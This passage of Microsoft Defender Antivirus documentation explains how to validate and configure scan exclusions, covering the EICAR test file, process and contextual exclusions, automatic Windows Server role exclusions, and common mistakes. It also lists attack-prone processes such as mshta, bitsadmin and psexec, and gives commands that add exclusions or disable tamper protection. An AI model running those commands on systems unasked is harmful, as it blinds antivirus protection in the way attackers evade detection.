the .testing extension, replace test.txt with test.testing . If you are testing a path, ensure you run the cmdlet within that path.
PowerShell
Invoke-WebRequest "https://secure.eicar.org/eicar.com.txt" -OutFile "test.txt"
If Microsoft Defender Antivirus reports malware, then the rule is not working. If there is no report of malware and the downloaded file
exists, then the exclusion is working. You can open the file to confirm the contents are the same as what is described on the EICAR test file
website .
You can also use the following PowerShell code, which calls the .NET WebClient class to download the test file - as with the Invoke-
WebRequest cmdlet; replace c:\test.txt with a file that conforms to the rule you are validating:
PowerShell
$client = new-object System.Net.WebClient

$client.DownloadFile("http://www.eicar.org/download/eicar.com.txt","c:\test.txt")
If you do not have Internet access, you can create your own EICAR test file by writing the EICAR string to a new text file with the following
PowerShell command:
PowerShell
[io.file]::WriteAllText("test.txt",'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to exclude.
 Tip

See also
Configure and validate exclusions in Microsoft Defender Antivirus scans
Configure and validate exclusions for files opened by processes
Configure Microsoft Defender Antivirus exclusions on Windows Server
 Tip
Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint
Tech Community .
Feedback

Configure exclusions for files opened by
processes
Article • 07/18/2023
Applies to:

Platforms
Windows
You can exclude files that are opened by specific processes from Microsoft Defender
Antivirus scans. Note that these types of exclusions are for files that are opened by
processes and not the processes themselves. To exclude a process, add a file exclusion
(see Configure and validate exclusions based on file extension and folder location).
See Important points about exclusions and review the information in Manage exclusions
for Microsoft Defender for Endpoint and Microsoft Defender Antivirus before defining
your exclusion lists.
This article describes how to configure exclusion lists.
Examples of exclusions
ﾉ Expand table
Exclusion Example
Any file on the machine that is opened Specifying test.exe would exclude files opened by:
by any process with a specific file name
c:\sample\test.exe
d:\internal\files\test.exe
Any file on the machine that is opened Specifying c:\test\sample\* would exclude files
by any process under a specific folder opened by:
c:\test\sample\test.exe
c:\test\sample\test2.exe
Exclusion Example
c:\test\sample\utility.exe
Any file on the machine that is opened Specifying c:\test\process.exe would exclude files
by a specific process in a specific folder only opened by c:\test\process.exe
When you add a process to the process exclusion list, Microsoft Defender Antivirus
won't scan files opened by that process, no matter where the files are located. The
process itself, however, will be scanned unless it has also been added to the file
exclusion list.
The exclusions only apply to always-on real-time protection and monitoring. They don't
apply to scheduled or on-demand scans.
Changes made with Group Policy to the exclusion lists will show in the lists in the
Windows Security app. However, changes made in the Windows Security app will not
show in the Group Policy lists.
You can add, remove, and review the lists for exclusions in Group Policy, Microsoft
Configuration Manager, Microsoft Intune, and with the Windows Security app, and you
can use wildcards to further customize the lists.
You can also use PowerShell cmdlets and WMI to configure the exclusion lists, including
reviewing your lists.
By default, local changes made to the lists (by users with administrator privileges;
changes made with PowerShell and WMI) are merged with the lists as defined (and
deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists take
precedence if there are conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow
local changes to override managed deployment settings.
７ Note
Network Protection and Attack surface reduction rules are directly impacted by
process exclusions on all platforms, meaning that a process exclusion on any OS
(Windows, MacOS, Linux) will result in Network Protection or ASR being unable to
inspect traffic or enforce rules for that specific process.
Configure the list of exclusions for files opened
by specified processes
Use Microsoft Intune to exclude files that have been

opened by specified processes from scans
For more information, see Configure device restriction settings in Microsoft Intune and
Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune.
Use Microsoft Configuration Manager to exclude files

that have been opened by specified processes from scans
See How to create and deploy antimalware policies: Exclusion settings for details on
configuring Microsoft Configuration Manager (current branch).
Use Group Policy to exclude files that have been opened

by specified processes from scans
2. In the Group Policy Management Editor, go to Computer configuration and click

Exclusions.
4. Double-click Process Exclusions and add the exclusions:

b. Under the Options section, click Show....
c. Enter each process on its own line under the Value name column. See the
example table for the different types of process exclusions. Enter 0 in the Value
column for all processes.
5. Click OK.
Use PowerShell cmdlets to exclude files that have been

opened by specified processes from scans
Using PowerShell to add or remove exclusions for files that have been opened by
processes requires using a combination of three cmdlets with the -ExclusionProcess
parameter. The cmdlets are all in the Defender module.
The format for the cmdlets is:
PowerShell
<cmdlet> -ExclusionProcess "<item>"
The following are allowed as the <cmdlet>:
ﾉ Expand table
Configuration action PowerShell cmdlet
Create or overwrite the list Set-MpPreference
Add to the list Add-MpPreference
Remove items from the list Remove-MpPreference
） Important
If you have created a list, either with Set-MpPreference or Add-MpPreference , using

the Set-MpPreference cmdlet again will overwrite the existing list.
For example, the following code snippet would cause Microsoft Defender Antivirus
scans to exclude any file that is opened by the specified process:
PowerShell
Add-MpPreference -ExclusionProcess "c:\internal\test.exe"
Manage antivirus with PowerShell cmdlets and Microsoft Defender Antivirus cmdlets.
Use Windows Management Instruction (WMI) to exclude

files that have been opened by specified processes from
scans
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the
following properties:
WMI
ExclusionProcess
The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-
MpPreference , Add-MpPreference , and Remove-MpPreference .
Use the Windows Security app to exclude files that have

been opened by specified processes from scans
See Add exclusions in the Windows Security app for instructions.
Use wildcards in the process exclusion list

The use of wildcards in the process exclusion list is different from their use in other
exclusion lists.
In particular, you can't use the question mark ( ? ) wildcard, and the asterisk ( * ) wildcard
can only be used at the end of a complete path. You can still use environment variables
(such as %ALLUSERSPROFILE% ) as wildcards when defining items in the process exclusion
list.
The following table describes how the wildcards can be used in the process exclusion
list:
ﾉ Expand table
Wildcard Example use Example matches
* (asterisk) C:\MyData\* Any file opened by C:\MyData\file.exe
Replaces
any number
of
characters
Environment %ALLUSERSPROFILE%\CustomLogFiles\file.exe Any file opened by

variables C:\ProgramData\CustomLogFiles\file.exe
Wildcard Example use Example matches
The defined
variable is
populated
as a path
when the
exclusion is
evaluated
Review the list of exclusions

You can retrieve the items in the exclusion list with MpCmdRun, PowerShell, Microsoft
Configuration Manager, Intune, or the Windows Security app.
If you use PowerShell, you can retrieve the list in two ways:
Retrieve the status of all Microsoft Defender Antivirus preferences. Each of the lists
are displayed on separate lines, but the items within each list are combined into
the same line.
Write the status of all preferences to a variable, and use that variable to only call
the specific list you're interested in. Each use of Add-MpPreference is written to a
new line.
Validate the exclusion list by using MpCmdRun

To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the
following command:
DOS
MpCmdRun.exe -CheckExclusion -path <path>
７ Note
Checking exclusions with MpCmdRun requires Microsoft Defender Antivirus CAMP

version 4.18.1812.3 (released in December 2018) or later.
Review the list of exclusions alongside all other Microsoft

Defender Antivirus preferences by using PowerShell
PowerShell
Get-MpPreference
Microsoft Defender Antivirus cmdlets .
Retrieve a specific exclusions list by using PowerShell

Use the following code snippet (enter each line as a separate command); replace
WDAVprefs with whatever label you want to name the variable:
PowerShell
$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionProcess
Microsoft Defender Antivirus cmdlets.
 Tip

Related articles
Configure and validate exclusions in Microsoft Defender Antivirus scans
Configure and validate exclusions based on file name, extension, and folder
location
Configure Microsoft Defender Antivirus exclusions on Windows Server
and remediation
 Tip
Feedback

Contextual file and folder exclusions
Article • 02/27/2024
Applies to:
Microsoft Defender for individuals
This article/section describes the contextual file and folder exclusions capability for
Microsoft Defender Antivirus on Windows. This capability allows you to be more specific
when you define under which context Microsoft Defender Antivirus shouldn't scan a file
or folder, by applying restrictions.
Overview
Exclusions are primarily intended to mitigate affects on performance. They come at the
penalty of reduced protection value. These restrictions allow you to limit this protection
reduction by specifying circumstances under which the exclusion should apply.
Contextual exclusions aren't suitable for addressing false positives in a reliable way. If
you encounter a false positive, you can submit files for analysis through the Microsoft
Defender XDR portal (subscription required) or through the Microsoft Security
Intelligence website. For a temporary suppression method, consider creating a custom
allow indicator in Microsoft Defender for Endpoint.
There are four restrictions you can apply to limit the applicability of an exclusion:
File/folder path type restriction. You can restrict exclusions to only apply if the
target is a file, or a folder by making the intent specific. If the target is a file but the
exclusion is specified to be a folder, it will not apply. Conversely, if the target is
folder but the exclusion is specified to be a file, the exclusion will apply.
Scan type restriction. Enables you to define the required scan type for an exclusion
to apply. For example, you only want to exclude a certain folder from Full scans but
not from a "resource" scan (targeted scan).
Scan trigger type restriction. You can use this restriction to specify that the
exclusion should only apply when the scan was initiated by a specific event:
on demand
on access
or originating from behavioral monitoring
Process restriction. Enables you to define that an exclusion should only apply
when a file or folder is being accessed by a specific process.
Configuring restrictions
Restrictions are typically applied by adding the restriction type to the file or folder
exclusion path.
ﾉ Expand table
Restriction TypeName value
File/folder PathType file

folder
Scan type ScanType quick

full
Scan trigger ScanTrigger OnDemand

OnAccess
BM
Process Process "<image_path>"
Requirements
This capability requires Microsoft Defender Antivirus:
Platform: 4.18.2205.7 or later

Engine: 1.1.19300.2 or later
Syntax
As a starting point, you may already have exclusions in place that you wish to make
more specific. To form the exclusion string, first define the path to the file or folder to be
excluded, then add the type name and associated value, as shown in the following
example.
<PATH>\:{TypeName:value,TypeName:value}
Keep in mind that all types and values are case sensitive.
７ Note
Conditions inside {} MUST be true for the restriction to match. For example, if you
specify two scan triggers this cannot be true, and the exclusion will not apply. To
specify two restrictions of the same type, create two separate exclusions.
Examples
The following string excludes "c:\documents\design.doc" only if it's a file and only in on-
access scans:
c:\documents\design.doc\:{PathType:file,ScanTrigger:OnAccess}
The following string excludes "c:\documents\design.doc" only if it's scanned (on-access)

due to it being accessed by a process having the image name "winword.exe":
c:\documents\design.doc\:{Process:"winword.exe"}
File and folder paths may contain wildcards, as in the following example:
c:\*\*.doc\:{PathType:file,ScanTrigger:OnDemand}
The process image path may contain wildcards, as in the following example:
c:\documents\design.doc\:{Process:"C:\Program Files*\Microsoft Office\root\Office??
\winword.exe"}
File/folder restriction
You can restrict exclusions to only apply if the target is a file or a folder by making the
intent specific. If the target is a file but the exclusion is specified to be a folder, the
exclusion won't apply. Conversely, if the target is folder but the exclusion is specified to
be a file, the exclusion will apply.
File/folder exclusions default behavior
If you don't specify any other options, the file/folder is excluded from all types of scans,
and the exclusion applies regardless of whether the target is a file or a folder. For more
information about customizing exclusions to only apply to a specific scan type, see Scan
type restriction.
７ Note
Wildcards are supported in file/folder exclusions.
Folders
To ensure an exclusion only applies if the target is a folder, not a file you can use the
PathType:folder restriction. For example:
C:\documents\*\:{PathType:folder}
Files
To make sure an exclusion only applies if the target is a file, not a folder you can use the
PathType: file restriction.
Example:
C:\documents\*.mdb\:{PathType:file}
Scan type restriction

By default, exclusions apply to all scan types:
resource: a single file or folder is scanned in a targeted way (for example, right-
click, Scan)
quick: common startup locations utilized by malware, memory and certain registry
keys
full: includes quick scan locations and complete file system (all files and folders)
To mitigate performance issues, you can exclude a folder or a set of files from being
scanned by a specific scan type. You can also define the required scan type for an
exclusion to apply.
To exclude a folder from being scanned only during a full scan, specify a restriction type
together with the file or folder exclusion, as in the following example:
C:\documents\:{ScanType:full}
To exclude a folder from being scanned only during a quick scan, specify a restriction
type together with the file or folder exclusion:
C:\program.exe\:{ScanType:quick}
If you want to make sure this exclusion only applies to a specific file and not a folder
(c:\foo.exe could be a folder), also apply the PathType restriction:
C:\program.exe\:{ScanType:quick,PathType:file}
Scan trigger restriction

By default, basic exclusions apply to all scan triggers. ScanTrigger restriction enables you
to specify that the exclusion should only apply when the scan was initiated by a specific
event; on demand (including quick, full and targeted scans), on access or originating
from behavioral monitoring (including memory scans).
OnDemand: a scan was triggered by a command or admin action. Remember that

scheduled quick and full scans also fall under this category.
OnAccess: a file or folder is opened/written/read/modified (typically considered
real-time protection)
BM: a behavioral trigger causes the behavioral monitoring to scan a specific file
To exclude a file or folder and its contents from being scanned only when the file is
being scanned after being accessed, define a scan trigger restriction such as the
following example:
c:\documents\:{ScanTrigger:OnAccess}
Process restriction
This restriction allows you to define that an exclusion should only apply when a file or
folder is being accessed by a specific process. A common scenario is when you want to
avoid excluding the process as that avoidance would cause Defender Antivirus to ignore
other operations by that process. Wildcards are supported in the process name/path.
７ Note
Using a large amount of process exclusion restrictions on a machine can adversely

affect performance. In addition, if an exclusion is restricted to a certain process or
processes, other active processes (such as indexing, backup, updates) can still
trigger file scans.
To exclude a file or folder only when accessed by a specific process, create a normal file
or folder exclusion and add the process to restrict the exclusion to. For example:
c:\documents\design.doc\:{Process:"winword.exe", Process:"msaccess.exe",
Process:"C:\Program Files*\Microsoft Office\root\Office??\winword.exe"}
How to configure
After constructing your desired contextual exclusions, you can use your existing
management tool to configure file and folder exclusions using the string you created.
See: Configure and validate exclusions for Microsoft Defender Antivirus scans
 Tip
Feedback

on Windows Server
Article • 08/07/2023
Applies to:

Platforms
Windows
This article describes types of exclusions that you don't have to define for Microsoft
Defender Antivirus:
Built-in exclusions for operating system files on all versions of Windows.

Automatic exclusions for roles on Windows Server 2016 and later.
For a more detailed overview of exclusions, see Manage exclusions for Microsoft
Defender for Endpoint and Microsoft Defender Antivirus.
A few important points about exclusions on

Windows Server
Custom exclusions take precedence over automatic exclusions.
Automatic exclusions only apply to real-time protection (RTP) scanning.
Automatic exclusions aren't honored during a quick scan, full scan, and custom
scan.
Custom and duplicate exclusions don't conflict with automatic exclusions.
Microsoft Defender Antivirus uses the Deployment Image Servicing and
Management (DISM) tools to determine which roles are installed on your
computer.
Appropriate exclusions must be set for software that isn't included with the
operating system.
Windows Server 2012 R2 doesn't have Microsoft Defender Antivirus as an
installable feature. When you onboard those servers to Defender for Endpoint,
you'll install Microsoft Defender Antivirus, and default exclusions for operating
system files are applied. However, exclusions for server roles (as specified below)
don't apply automatically, and you should configure these exclusions as
appropriate. To learn more, see Onboard Windows servers to the Microsoft
Defender for Endpoint service.
Built-in exclusions and automatic server role exclusions don't appear in the
standard exclusion lists that are shown in the Windows Security app.
changes. This article lists some, but not all, of the built-in and automatic exclusions.
Automatic server role exclusions

On Windows Server 2016 or later, you shouldn't need to define exclusions for server
roles. When you install a role on Windows Server 2016 or later, Microsoft Defender
Antivirus includes automatic exclusions for the server role and any files that are added
while installing the role.
Windows Server 2012 R2 does not support the automatic exclusions feature. You'll need
to define explicit exclusions for any server role and any software that's added after
installing the operating system.
） Important
Default locations could be different than the locations that are described in
this article.
To set exclusions for software that isn't included as a Windows feature or
server role, refer to the software manufacturer's documentation.
Automatic exclusions include:
Hyper-V exclusions
SYSVOL files
Active Directory exclusions
DHCP Server exclusions
DNS Server exclusions
File and Storage Services exclusions
Print Server exclusions
Web Server exclusions
Windows Server Update Services exclusions
Hyper-V exclusions
The following table lists the file type exclusions, folder exclusions, and process
exclusions that are delivered automatically when you install the Hyper-V role.
ﾉ Expand table
Exclusion type Specifics
File types *.vhd

*.vhdx
*.avhd
*.avhdx
*.vsv
*.iso
*.rct
*.vmcx
*.vmrs
Folders %ProgramData%\Microsoft\Windows\Hyper-V
%ProgramFiles%\Hyper-V
%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots
%Public%\Documents\Hyper-V\Virtual Hard Disks
Processes %systemroot%\System32\Vmms.exe
%systemroot%\System32\Vmwp.exe
SYSVOL files
%systemroot%\Sysvol\Domain\*.adm
%systemroot%\Sysvol\Domain\*.admx
%systemroot%\Sysvol\Domain\*.adml
%systemroot%\Sysvol\Domain\Registry.pol
%systemroot%\Sysvol\Domain\*.aas
%systemroot%\Sysvol\Domain\*.inf
%systemroot%\Sysvol\Domain\*Scripts.ini
%systemroot%\Sysvol\Domain\*.ins
%systemroot%\Sysvol\Domain\Oscfilter.ini
Active Directory exclusions

This section lists the exclusions that are delivered automatically when you install Active
Directory Domain Services (AD DS).
NTDS database files
The database files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database
File
%windir%\Ntds\ntds.dit
%windir%\Ntds\ntds.pat
The AD DS transaction log files
The transaction log files are specified in the registry key

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log
Files Path
%windir%\Ntds\EDB*.log
%windir%\Ntds\Res*.log
%windir%\Ntds\Edb*.jrs
%windir%\Ntds\Ntds*.pat
%windir%\Ntds\TEMP.edb
The NTDS working folder

This folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working
Directory
%windir%\Ntds\Temp.edb
%windir%\Ntds\Edb.chk
Process exclusions for AD DS and AD DS-related support files

%systemroot%\System32\ntfrs.exe
%systemroot%\System32\lsass.exe
DHCP Server exclusions

This section lists the exclusions that are delivered automatically when you install the
DHCP Server role. The DHCP Server file locations are specified by the DatabasePath,
DhcpLogFilePath, and BackupDatabasePath parameters in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters
%systemroot%\System32\DHCP\*\*.mdb
%systemroot%\System32\DHCP\*\*.pat
%systemroot%\System32\DHCP\*\*.log
%systemroot%\System32\DHCP\*\*.chk
%systemroot%\System32\DHCP\*\*.edb
DNS Server exclusions

This section lists the file and folder exclusions and the process exclusions that are
delivered automatically when you install the DNS Server role.
File and folder exclusions for the DNS Server role

%systemroot%\System32\Dns\*\*.log
%systemroot%\System32\Dns\*\*.dns
%systemroot%\System32\Dns\*\*.scc
%systemroot%\System32\Dns\*\BOOT
Process exclusions for the DNS Server role

%systemroot%\System32\dns.exe
File and Storage Services exclusions

This section lists the file and folder exclusions that are delivered automatically when you
install the File and Storage Services role. The exclusions listed below don't include
exclusions for the Clustering role.
%SystemDrive%\ClusterStorage
%clusterserviceaccount%\Local Settings\Temp
%SystemDrive%\mscs
Print Server exclusions

This section lists the file type exclusions, folder exclusions, and the process exclusions
that are delivered automatically when you install the Print Server role.
File type exclusions
*.shd
*.spl
Folder exclusions
This folder is specified in the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDire
ctory
%system32%\spool\printers\*
Process exclusions for the Print Server role

spoolsv.exe
Web Server exclusions

This section lists the folder exclusions and the process exclusions that are delivered
automatically when you install the Web Server role.
Folder exclusions
%SystemRoot%\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\ASP Compiled Templates
%systemDrive%\inetpub\logs
%systemDrive%\inetpub\wwwroot
Process exclusions for the Web Server role

%SystemRoot%\system32\inetsrv\w3wp.exe
%SystemRoot%\SysWOW64\inetsrv\w3wp.exe
%SystemDrive%\PHP5433\php-cgi.exe
Turning off scanning of files in the Sysvol\Sysvol folder or the

SYSVOL_DFSR\Sysvol folder
The current location of the Sysvol\Sysvol or SYSVOL_DFSR\Sysvol folder and all the
subfolders is the file system reparse target of the replica set root. The Sysvol\Sysvol
and SYSVOL_DFSR\Sysvol folders use the following locations by default:
%systemroot%\Sysvol\Domain
%systemroot%\Sysvol_DFSR\Domain
The path to the currently active SYSVOL is referenced by the NETLOGON share and can
be determined by the SysVol value name in the following subkey:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Netlogon\Parameters
Exclude the following files from this folder and all its subfolders:
*.adm
*.admx
*.adml
Registry.pol
Registry.tmp
*.aas
*.inf
Scripts.ini
*.ins
Oscfilter.ini
Windows Server Update Services exclusions

This section lists the folder exclusions that are delivered automatically when you install
the Windows Server Update Services (WSUS) role. The WSUS folder is specified in the
registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Update Services\Server\Setup
%systemroot%\WSUS\WSUSContent
%systemroot%\WSUS\UpdateServicesDBFiles
%systemroot%\SoftwareDistribution\Datastore
%systemroot%\SoftwareDistribution\Download
Built-in exclusions
Because Microsoft Defender Antivirus is built into Windows, it doesn't require exclusions
for operating system files on any version of Windows.
Built-in exclusions include:

Windows "temp.edb" files
Windows Update files or Automatic Update files
Group Policy files
WINS files
File Replication Service (FRS) exclusions
Process exclusions for built-in operating system files
changes.
Windows "temp.edb" files

%windir%\SoftwareDistribution\Datastore\*\tmp.edb
%ProgramData%\Microsoft\Search\Data\Applications\Windows\windows.edb
Windows Update files or Automatic Update files

%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%windir%\SoftwareDistribution\Datastore\*\edb.chk
%windir%\SoftwareDistribution\Datastore\*\edb\*.log
%windir%\SoftwareDistribution\Datastore\*\Edb\*.jrs
%windir%\SoftwareDistribution\Datastore\*\Res\*.log

%windir%\Security\database\*.chk
%windir%\Security\database\*.edb
%windir%\Security\database\*.jrs
%windir%\Security\database\*.log
%windir%\Security\database\*.sdb
Group Policy files

%allusersprofile%\NTUser.pol
%SystemRoot%\System32\GroupPolicy\Machine\registry.pol
%SystemRoot%\System32\GroupPolicy\User\registry.pol
WINS files
%systemroot%\System32\Wins\*\*.chk
%systemroot%\System32\Wins\*\*.log
%systemroot%\System32\Wins\*\*.mdb
%systemroot%\System32\LogFiles\
%systemroot%\SysWow64\LogFiles\
File Replication Service (FRS) exclusions

Files in the File Replication Service (FRS) working folder. The FRS working folder is
specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working
Directory
%windir%\Ntfrs\jet\sys\*\edb.chk
%windir%\Ntfrs\jet\*\Ntfrs.jdb
%windir%\Ntfrs\jet\log\*\*.log
FRS Database log files. The FRS Database log file folder is specified in the registry
key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Ntfrs\Parameters\DB
Log File Directory
%windir%\Ntfrs\*\Edb\*.log
The FRS staging folder. The staging folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Replica
Sets\GUID\Replica Set Stage
%systemroot%\Sysvol\*\Ntfrs_cmp*\
The FRS preinstall folder. This folder is specified by the folder

Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory
%systemroot%\SYSVOL\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory\*\Ntfrs
*\
The Distributed File System Replication (DFSR) database and working folders.
These folders are specified by the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DFSR\Parameters\Replicati
on Groups\GUID\Replica Set Configuration File
７ Note
For custom locations, see Opting out of automatic exclusions.
%systemdrive%\System Volume Information\DFSR\$db_normal$

%systemdrive%\System Volume Information\DFSR\FileIDTable_*
%systemdrive%\System Volume Information\DFSR\SimilarityTable_*
%systemdrive%\System Volume Information\DFSR\*.XML

%systemdrive%\System Volume Information\DFSR\$db_dirty$
%systemdrive%\System Volume Information\DFSR\$db_clean$
%systemdrive%\System Volume Information\DFSR\$db_lostl$

%systemdrive%\System Volume Information\DFSR\Dfsr.db
%systemdrive%\System Volume Information\DFSR\*.frx

%systemdrive%\System Volume Information\DFSR\*.log
%systemdrive%\System Volume Information\DFSR\Fsr*.jrs
%systemdrive%\System Volume Information\DFSR\Tmp.edb
Process exclusions for built-in operating system files

%systemroot%\System32\dfsr.exe
%systemroot%\System32\dfsrs.exe
Opting out of automatic exclusions

In Windows Server 2016 and later, the predefined exclusions delivered by Security
intelligence updates only exclude the default paths for a role or feature. If you installed
a role or feature in a custom path, or you want to manually control the set of exclusions,
make sure to opt out of the automatic exclusions delivered in Security intelligence
updates. But keep in mind that the exclusions that are delivered automatically are
optimized for Windows Server 2016 and later. See Important points about exclusions
before defining your exclusion lists.
２ Warning
Opting out of automatic exclusions might adversely impact performance, or result

in data corruption. Automatic server role exclusions are optimized for Windows
Server 2016, Windows Server 2019, and Windows Server 2022.
Because predefined exclusions only exclude default paths, if you move NTDS and
SYSVOL folders to another drive or path that is different from the original path, you must
add exclusions manually. See Configure the list of exclusions based on folder name or
file extension.
You can disable the automatic exclusion lists with Group Policy, PowerShell cmdlets, and
WMI.
Use Group Policy to disable the auto-exclusions list on

Windows Server 2016, Windows Server 2019, and
Windows Server 2022
Console. Right-click the Group Policy Object you want to configure, and then select
Edit.
2. In the Group Policy Management Editor go to Computer configuration, and then

Exclusions.
4. Double-click Turn off Auto Exclusions, and set the option to Enabled. Then select
OK.
Use PowerShell cmdlets to disable the auto-exclusions list

on Windows Server
PowerShell
Set-MpPreference -DisableAutoExclusions $true
To learn more, see the following resources:
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus.

Use PowerShell with Microsoft Defender Antivirus.
Use Windows Management Instruction (WMI) to disable

the auto-exclusions list on Windows Server
WMI
DisableAutoExclusions
For more information and allowed parameters, see:
Defining custom exclusions

If necessary, you can add or remove custom exclusions. To do that, see the following
articles:
Configure custom exclusions for Microsoft Defender Antivirus

Configure and validate exclusions based on file name, extension, and folder
location
Configure and validate exclusions for files opened by processes
See also
and remediation
 Tip
Feedback

Common mistakes to avoid when
defining exclusions
Article • 07/18/2023
Applies to:

Platforms
Windows
macOS
Linux
） Important
Add exclusions with caution. Exclusions for Microsoft Defender Antivirus scans
reduce the level of protection for devices.
You can define an exclusion list for items that you don't want Microsoft Defender
Antivirus to scan. However, excluded items could contain threats that make your device
vulnerable. This article describes some common mistakes that you should avoid when
defining exclusions.
 Tip
Before defining your exclusion lists, see Important points about exclusions and
review the detailed information in Exclusions for Microsoft Defender for Endpoint
and Microsoft Defender Antivirus.
Excluding certain trusted items

Certain files, file types, folders, or processes shouldn't be excluded from scanning even
though you trust that they're not malicious. Don't define exclusions for the folder
locations, file extensions, and processes that are listed in the following sections:
Folder locations
File extensions
Processes
Folder locations
） Important
Certain folders shouldn't be excluded from scans because they can end up being
folders where malicious files can get dropped.
In general, don't define exclusions for any of the following folder locations:
%systemdrive%
C: , C:\ , or C:\*
%ProgramFiles%\Java or C:\Program Files\Java

%ProgramFiles%\Contoso\ , C:\Program Files\Contoso\ ,
%ProgramFiles(x86)%\Contoso\ , or C:\Program Files (x86)\Contoso\
C:\Temp , C:\Temp\ , or C:\Temp\*

C:\Users\ or C:\Users\*
C:\Users\<UserProfileName>\AppData\Local\Temp\ or C:\Users\
<UserProfileName>\AppData\LocalLow\Temp\ . Note the following important
exceptions for SharePoint: Do exclude

C:\Users\ServiceAccount\AppData\Local\Temp or
C:\Users\Default\AppData\Local\Temp when you use file-level antivirus protection
in SharePoint .
%Windir%\Prefetch , C:\Windows\Prefetch , C:\Windows\Prefetch\ , or
C:\Windows\Prefetch\*
%Windir%\System32\Spool or C:\Windows\System32\Spool
C:\Windows\System32\CatRoot2
%Windir%\Temp , C:\Windows\Temp , C:\Windows\Temp\ , or C:\Windows\Temp\*
Linux and macOS Platforms

In general, don't define exclusions for the following folder locations:
/bin or /sbin
/usr/lib
File extensions
） Important
Certain file extensions shouldn't be excluded because they can be file types that are
used in an attack.
In general, don't define exclusions for the following file extensions:
.7z
.bat
.bin
.cab
.cmd
.com
.cpl
.dll
.exe
.fla
.gif
.gz
.hta
.inf
.java
.jar
.job
.jpeg
.jpg
.js
.ko or .ko.gz
.msi
.ocx
.png
.ps1
.py
.rar
.reg
.scr
.sys
.tar
.tmp
.url
.vbe
.vbs
.wsf
.zip
Processes
） Important
Certain processes shouldn't be excluded because they get used during attacks.
In general, don't define exclusions for the following processes:
AcroRd32.exe
addinprocess.exe
addinprocess32.exe
addinutil.exe
bash.exe
bginfo.exe
bitsadmin.exe
cdb.exe
csi.exe
cmd.exe
cscript.exe
dbghost.exe
dbgsvc.exe
dnx.exe
dotnet.exe
excel.exe
fsi.exe
fsiAnyCpu.exe
iexplore.exe
java.exe
kd.exe
lxssmanager.dll
msbuild.exe
mshta.exe
ntkd.exe
ntsd.exe
outlook.exe
psexec.exe
powerpnt.exe
powershell.exe
rcsi.exe
svchost.exe
schtasks.exe
system.management.automation.dll
windbg.exe
winword.exe
wmic.exe
wscript.exe
wuauclt.exe
７ Note
You can choose to exclude file types, such as .gif , .jpg , .jpeg , or .png if your
environment has a modern, up-to-date software with a strict update policy to
handle any vulnerabilities.
Linux and macOS Platforms
In general, don't define exclusions for the following processes:
bash
java
python and python3
sh
zsh
Using just the file name in the exclusion list

Malware might have the same name as that of a file that you trust and want to exclude
from scanning. Therefore, to avoid excluding potential malware from scanning, use a
fully qualified path to the file that you want to exclude instead of using just the file
name. For example, if you want to exclude Filename.exe from scanning, use the
complete path to the file, such as C:\program files\contoso\Filename.exe .
Using a single exclusion list for multiple server

workloads
Don't use a single exclusion list to define exclusions for multiple server workloads. Split
the exclusions for different application or service workloads into multiple exclusion lists.
For example, the exclusion list for your IIS Server workload must be different from the
exclusion list for your SQL Server workload.
Using incorrect environment variables as

wildcards in the file name and folder path or
extension exclusion lists
Microsoft Defender Antivirus Service runs in system context using the LocalSystem
account, which means it gets information from the system environment variable, and
not from the user environment variable. Use of environment variables as a wildcard in
exclusion lists is limited to system variables and those applicable to processes running
as an NT AUTHORITY\SYSTEM account. Therefore, don't use user environment variables
as wildcards when adding Microsoft Defender Antivirus folder and process exclusions.
See the table under System environment variables for a complete list of system
environment variables.
See Use wildcards in the file name and folder path or extension exclusion lists for
information on how to use wildcards in exclusion lists.
See also
Configure custom exclusions for Microsoft Defender Antivirus
Configure and validate exclusions for Microsoft Defender for Endpoint on Linux
 Tip
Feedback

Get started with troubleshooting mode
in Microsoft Defender for Endpoint
Article • 09/25/2023
Applies to:

Troubleshooting mode in Microsoft Defender for Endpoint enables admins to

troubleshoot various Microsoft Defender Antivirus features, even if devices are managed
by organizational policies. For example, if tamper protection is enabled, certain settings
can't be modified or turned off, but you can use troubleshooting mode on a device to
edit those settings temporarily.
Troubleshooting mode is disabled by default, and requires you to turn it on for a device
(and/or group of devices) for a limited time. Troubleshooting mode is exclusively an
enterprise-only feature, and requires Microsoft Defender portal access.
 Tip
During troubleshooting mode, you can use the PowerShell command Set-
MPPreference -DisableTamperProtection $true on Windows devices.
To check the state of tamper protection, you can use the Get-
MpComputerStatus PowerShell cmdlet. In the list of results, look for
IsTamperProtected or RealTimeProtectionEnabled . (A value of true means
tamper protection is enabled.) .

During troubleshooting mode, you can use the PowerShell command Set-MPPreference
-DisableTamperProtection $true or, on client operating systems, the Security Center app
